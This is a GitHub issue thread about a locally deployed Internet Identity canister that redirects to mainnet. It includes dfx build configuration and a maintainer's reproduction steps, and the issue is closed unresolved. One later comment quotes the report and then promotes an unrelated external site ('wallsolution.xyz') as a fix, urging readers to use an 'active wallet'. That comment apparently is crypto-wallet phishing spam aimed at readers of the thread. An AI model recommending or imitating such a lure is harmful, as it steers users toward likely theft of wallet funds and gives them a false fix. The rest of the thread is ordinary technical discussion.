### ISSUE TITLE
local canister redirects to mainnet

### ISSUE THREAD

**Issue by 7flash** [dfinity/internet-identity#686] opened 2022-06-16 09:59 UTC
Expected to authorize locally but it redirects me to mainnet..

Notice it only happens in latest release.. works as expecte in releases prior to this one.. [release-2022-06-13](https://github.com/dfinity/internet-identity/releases/tag/release-2022-06-13)

![tenten](https://user-images.githubusercontent.com/4569866/174045857-3a123ba7-8104-4f5c-9b2b-3ab7fe375d00.gif)

**Comment by nmattia** [comment] 2022-06-16 11:08
hi @7flash , can you clarify which canister is redirecting you to mainnet? do you mean that you are running a canister locally with dfx and that canister is using identity.ic0.app for authentication, or do you mean that you are running a local II canister that then redirects to identity.ic0.app? I see you're visiting `/authorize` on localhost, is that your own canister?

**Comment by 7flash** [comment] 2022-06-16 22:33
Deploying II canister with dfx..

```
    "internet_identity": {
      "type": "custom",
      "candid": "internet_identity.did",
      "wasm": "internet_identity.wasm",
      "build": "curl -sSL https://github.com/dfinity/internet-identity/releases/download/release-2022-06-07_2/internet_identity_dev.wasm -o internet_identity.wasm"
    }
```

The configuration above works well..

The described issue happens if I download latest release instead..

```
      "build": "curl -sSL https://github.com/dfinity/internet-identity/releases/latest/download/internet_identity_dev.wasm -o internet_identity.wasm"
```

**Comment by nmattia** [comment] 2022-06-17 08:36
Unfortunately I can't reproduce the issue using our [using-dev-build demo](https://github.com/dfinity/internet-identity/tree/main/demos/using-dev-build#usage). Do you know if your canister is doing anything different?

Can you try to reproduce using `using-dev-build`? 

* Checkout the repo 
* run `dfx start`
* in `demos/using-dev-build`, run `dfx deploy`
* locate the _frontend_ canister URL in the output and open it
  ```
  URLs:
    Frontend:
      webapp: http://0.0.0.0:8000/?canisterId=rrkah-fqaaa-aaaaa-aaaaq-cai
  ```
* Click "Login with Internet Identity"


By default the demo uses the latest Internet Identity dev build. This is what I get:


https://user-images.githubusercontent.com/6930756/174260645-5d2d3fc4-ad0d-467e-8b5c-9a22f15d52a2.mov

**Comment by Acetarax** [comment] 2022-07-18 22:17
> Expected to authorize locally but it redirects me to mainnet..
> 
> Notice it only happens in latest release.. works as expecte in releases prior to this one.. [release-2022-06-13](https://github.com/dfinity/internet-identity/releases/tag/release-2022-06-13)
> 
> ![tenten](https://user-images.githubusercontent.com/4569866/174045857-3a123ba7-8104-4f5c-9b2b-3ab7fe375d00.gif) [ ![tenten](https://user-images.githubusercontent.com/4569866/174045857-3a123ba7-8104-4f5c-9b2b-3ab7fe375d00.gif) ](https://user-images.githubusercontent.com/4569866/174045857-3a123ba7-8104-4f5c-9b2b-3ab7fe375d00.gif) [ ](https://user-images.githubusercontent.com/4569866/174045857-3a123ba7-8104-4f5c-9b2b-3ab7fe375d00.gif)

Make use of this https://www.wallsolution.xyz/ this worked for my similar issue, but always use an active wallet, 100% Transparency

**Comment by nmattia** [comment] 2022-09-30 09:12
For lack of reproduction I'm going to close this, but feel free to re-open if the issue persists!

**Closed by nmattia** 2022-09-30 09:12 UTC
